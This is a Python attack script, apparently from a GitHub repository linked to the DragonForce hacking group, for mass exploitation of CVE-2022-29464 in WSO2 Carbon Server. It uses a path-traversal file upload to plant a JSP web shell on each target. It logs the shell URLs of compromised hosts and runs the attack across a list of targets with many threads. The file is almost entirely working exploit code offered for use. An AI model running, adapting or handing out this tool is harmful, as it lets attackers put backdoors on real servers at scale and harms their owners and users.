-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathwso.py
97 lines (77 loc) · 7.26 KB
/
wso.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
# Author: Pari Malam
import requests
import os
import urllib3
import concurrent.futures
from sys import stdout
from colorama import Fore, init
from concurrent.futures import ThreadPoolExecutor
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if not os.path.exists('Results'):
os.mkdir('Results')
os.system('clear' if os.name == 'posix' else 'cls')
def banners():
os.system('clear' if os.name == 'posix' else 'cls')
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝\n")
stdout.write(""+Fore.LIGHTRED_EX +"╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n")
stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/PARI-MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"OFFICIAL FORUM "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" DRAGONFORCE.IO "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"OFFICIAL TELEGRAM "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" TELEGRAM.ME/DRAGONFORCEIO "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
print(f"{Fore.YELLOW}[CVE-2022-29464] - {Fore.GREEN}PERFORM WITH MASS EXPLOITS WSO2 CARBON SERVER\n")
banners()
def exploit(url):
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', 'Content-Type': 'application/json'} # .MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx
files = {"../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp": open("Files/shell.jsp", "rb")}
resp = requests.post(f"{url}/fileupload/toolsAny", timeout=10, verify=False, files=files)
if resp.status_code == 200 and len(resp.content) > 0 and 'java' not in resp.text:
print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.RED} .: {Fore.GREEN}[W00T!] {Fore.YELLOW}- {Fore.GREEN}{url}/authenticationendpoint/shell.jsp")
with open('Results/Results.txt', 'a') as f:
f.write(f"{url}/authenticationendpoint/shell.jsp\n")
else:
print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.YELLOW} .: {Fore.RED}[Failed!] {Fore.YELLOW}- {Fore.RED}{url}")
except KeyboardInterrupt:
print(f"{Fore.CYAN}KeyboardInterrupt{Fore.RESET}")
def single_scan():
url = input(f"{Fore.YELLOW}[DOMAIN/IP] {Fore.RED}.: {Fore.WHITE}")
if not url.startswith("http"):
url = "https://" + url
exploit(url)
def mass_scan():
urls_file = input(f"{Fore.YELLOW}[DOMAIN/IP LIST] {Fore.RED}.: {Fore.WHITE}")
if not os.path.isfile(urls_file):
print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!\n")
return
with open(urls_file, "r") as f:
urls = f.read().splitlines()
urls = [url if url.startswith("http") else "https://" + url for url in urls]
try:
max_threads = int(input(f"{Fore.YELLOW}[THREAD: 10-30] {Fore.RED}.: {Fore.WHITE}") or "10")
with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
results = [executor.submit(exploit, url) for url in urls]
except KeyboardInterrupt:
print(f"\n{Fore.RED}[KeyboardInterrupt]{Fore.RESET}")
def main():
print(f"{Fore.RED}[1] - {Fore.YELLOW}SINGLE SCAN")
print(f"{Fore.RED}[2] - {Fore.YELLOW}MASSIVE SCAN\n")
choice = input(f"{Fore.YELLOW}[CVE-2022-29464] {Fore.RED}.: ")
if choice == "1":
single_scan()
elif choice == "2":
mass_scan()
else:
print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!")
if __name__ == '__main__':
main()